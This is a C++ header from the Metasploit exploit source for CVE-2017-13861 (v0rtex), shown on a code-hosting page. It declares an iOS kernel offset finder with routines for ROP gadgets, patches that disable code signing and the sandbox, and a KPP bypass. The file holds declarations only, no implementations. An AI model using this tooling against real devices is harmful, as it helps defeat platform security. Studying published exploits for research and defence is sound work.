CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/exploits/CVE-2017-13861/liboffsetfinder64/liboffsetfinder64.hpp
Views: 11784
1
//

2
//  offsetfinder64.hpp

3
//  offsetfinder64

4
//

5
//  Created by tihmstar on 10.01.18.

6
//  Copyright © 2018 tihmstar. All rights reserved.

7
//

8


9
#ifndef offsetfinder64_hpp

10
#define offsetfinder64_hpp

11


12
#include <string>

13
#include <stdint.h>

14
#include <mach-o/loader.h>

15
#include <mach-o/nlist.h>

16
#include <mach-o/dyld_images.h>

17
#include <vector>

18
#include <functional>

19


20
#include <stdlib.h>

21
#include "common.h"

22
#include "insn.hpp"

23
#include "exception.hpp"

24
#include "patch.hpp"

25


26
namespace tihmstar {

27
    class offsetfinder64 {

28
    public:

29
        enum tristate{

30
            kfalse = 0,

31
            ktrue = 1,

32
            kuninitialized = 2

33
        };

34
    private:

35
        bool _freeKernel;

36
        bool _kernelIsSlid;

37
        uint64_t _kslide;

38
        uint8_t *_kdata;

39
        size_t _ksize;

40
        patchfinder64::loc_t _kernel_entry;

41
        patchfinder64::loc_t _kernel_base;

42
        std::vector<patchfinder64::text_t> _segments;

43
        tristate _haveSymtab = kuninitialized;

44
        

45
        struct symtab_command *__symtab;

46
        void loadSegments();

47
        __attribute__((always_inline)) struct symtab_command *getSymtab();

48
        

49
    public:

50
        offsetfinder64(const char *filename, uint64_t kslide = 0, tristate haveSymbols = kuninitialized);

51
        offsetfinder64(void* buf, size_t size, uint64_t kslide, tristate haveSymbols = kfalse);

52
        const void *kdata();

53
        patchfinder64::loc_t find_entry();

54
        patchfinder64::loc_t find_base();

55
        const std::vector<patchfinder64::text_t> &segments(){return _segments;};

56
        bool haveSymbols();

57
        

58
        patchfinder64::loc_t memmem(const void *little, size_t little_len);

59
        uint64_t             deref(patchfinder64::loc_t pos);

60
        

61
        patchfinder64::loc_t find_sym(const char *sym);

62
        patchfinder64::loc_t find_syscall0();

63
        uint64_t             find_register_value(patchfinder64::loc_t where, int reg, patchfinder64::loc_t startAddr = 0);

64
        

65
        /*------------------------ v0rtex -------------------------- */

66
        patchfinder64::loc_t find_zone_map();

67
        patchfinder64::loc_t find_kernel_map();

68
        patchfinder64::loc_t find_kernel_task();

69
        patchfinder64::loc_t find_realhost();

70
        patchfinder64::loc_t find_bzero();

71
        patchfinder64::loc_t find_bcopy();

72
        patchfinder64::loc_t find_copyout();

73
        patchfinder64::loc_t find_copyin();

74
        patchfinder64::loc_t find_ipc_port_alloc_special();

75
        patchfinder64::loc_t find_ipc_kobject_set();

76
        patchfinder64::loc_t find_ipc_port_make_send();

77
        patchfinder64::loc_t find_chgproccnt();

78
        patchfinder64::loc_t find_kauth_cred_ref();

79
        patchfinder64::loc_t find_osserializer_serialize();

80
        uint32_t             find_vtab_get_external_trap_for_index();

81
        uint32_t             find_vtab_get_retain_count();

82
        uint32_t             find_iouserclient_ipc();

83
        uint32_t             find_ipc_space_is_task();

84
        uint32_t             find_ipc_space_is_task_11();

85
        uint32_t             find_proc_ucred();

86
        uint32_t             find_task_bsd_info();

87
        uint32_t             find_vm_map_hdr();

88
        uint32_t             find_task_itk_self();

89
        uint32_t             find_task_itk_registered();

90
        uint32_t             find_sizeof_task();

91
        

92
        patchfinder64::loc_t find_rop_add_x0_x0_0x10();

93
        patchfinder64::loc_t find_rop_ldr_x0_x0_0x10();

94
        patchfinder64::loc_t find_exec(std::function<bool(patchfinder64::insn &i)>cmpfunc);

95
        

96
        

97
        /*------------------------ kernelpatches -------------------------- */

98
        patchfinder64::patch find_i_can_has_debugger_patch_off();

99
        patchfinder64::patch find_lwvm_patch_offsets();

100
        patchfinder64::patch find_remount_patch_offset();

101
        std::vector<patchfinder64::patch> find_nosuid_off();

102
        patchfinder64::patch find_proc_enforce();

103
        patchfinder64::patch find_amfi_patch_offsets();

104
        patchfinder64::patch find_cs_enforcement_disable_amfi();

105
        patchfinder64::patch find_amfi_substrate_patch();

106
        patchfinder64::patch find_sandbox_patch();

107
        patchfinder64::loc_t find_sbops();

108
        patchfinder64::patch find_nonceEnabler_patch();

109
        patchfinder64::patch find_nonceEnabler_patch_nosym();

110


111
        

112
        /*------------------------ KPP bypass -------------------------- */

113
        patchfinder64::loc_t find_gPhysBase();

114
        patchfinder64::loc_t find_gPhysBase_nosym();

115
        patchfinder64::loc_t find_kernel_pmap();

116
        patchfinder64::loc_t find_kernel_pmap_nosym();

117
        patchfinder64::loc_t find_cpacr_write();

118
        patchfinder64::loc_t find_idlesleep_str_loc();

119
        patchfinder64::loc_t find_deepsleep_str_loc();

120


121
        /*------------------------ Util -------------------------- */

122
        patchfinder64::loc_t find_rootvnode();

123
        patchfinder64::loc_t find_allproc();

124
        

125
        

126
        ~offsetfinder64();

127
    };

128
}

129


130


131


132
#endif /* offsetfinder64_hpp */

133


134